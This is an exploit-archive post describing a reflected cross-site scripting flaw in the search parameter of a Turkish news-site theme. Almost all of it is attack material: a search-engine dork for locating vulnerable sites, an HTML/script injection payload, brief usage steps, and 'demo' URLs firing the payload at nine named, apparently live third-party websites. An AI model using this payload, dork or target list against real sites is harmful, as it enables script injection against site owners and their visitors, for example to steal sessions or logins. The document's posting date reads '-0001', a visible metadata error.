BTMediaSoft BiggestNews Theme Cross Site Scripting
Posted on 30 November -0001
<HTML><HEAD><TITLE>BTMediaSoft BiggestNews Theme Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : BTMediaSoft BiggestNews Theme Cross Site Scripting # Exploit Author : Darkcrew.Org # Vendor Homepage : https://www.tumeva.com/ # Google Dork : intext:"© 2016 BTMediaSoft Haber Teması" # Date: 06.07.2016 # Contact: sultan.ahmir1997@yandex.com ###################### # Vulnerable File : /?s= # Payload : "/></script><script>alert(/MirSultan/)</script> # Describe : Search dork and select Target. Put /?s= After url such as : # http://site.com/?s= # Send data(Payload) with post method ... Ok # # Demo : # http://turktimes.org/?s="/></script><script>alert(/MirSultan/)</script> # http://kusadasi.news/?s="/></script><script>alert(/MirSultan/)</script> # http://bilisimhaberi.com/?s="/></script><script>alert(/MirSultan/)</script> # http://internethaberajansi.com/?s="/</script><script>alert(/MirSultan/)</script> # http://element9music.com/?s="/></script><script>alert(/MirSultan/)</script> # http://kusadasihaberler.com/?s="/></script><script>alert(/MirSultan/)</script> # http://son24haber.com/?s="/></script><script>alert(/MirSultan/)</script> # http://sondakikakusadasi.com/?s="/></script><script>alert(/MirSultan/)</script> # http://projehabercisi.com/?s="/></script><script>alert(/MirSultan/)</script> # ###################### # discovered by : Batur-ı Mir Sultan ###################### </BODY></HTML>
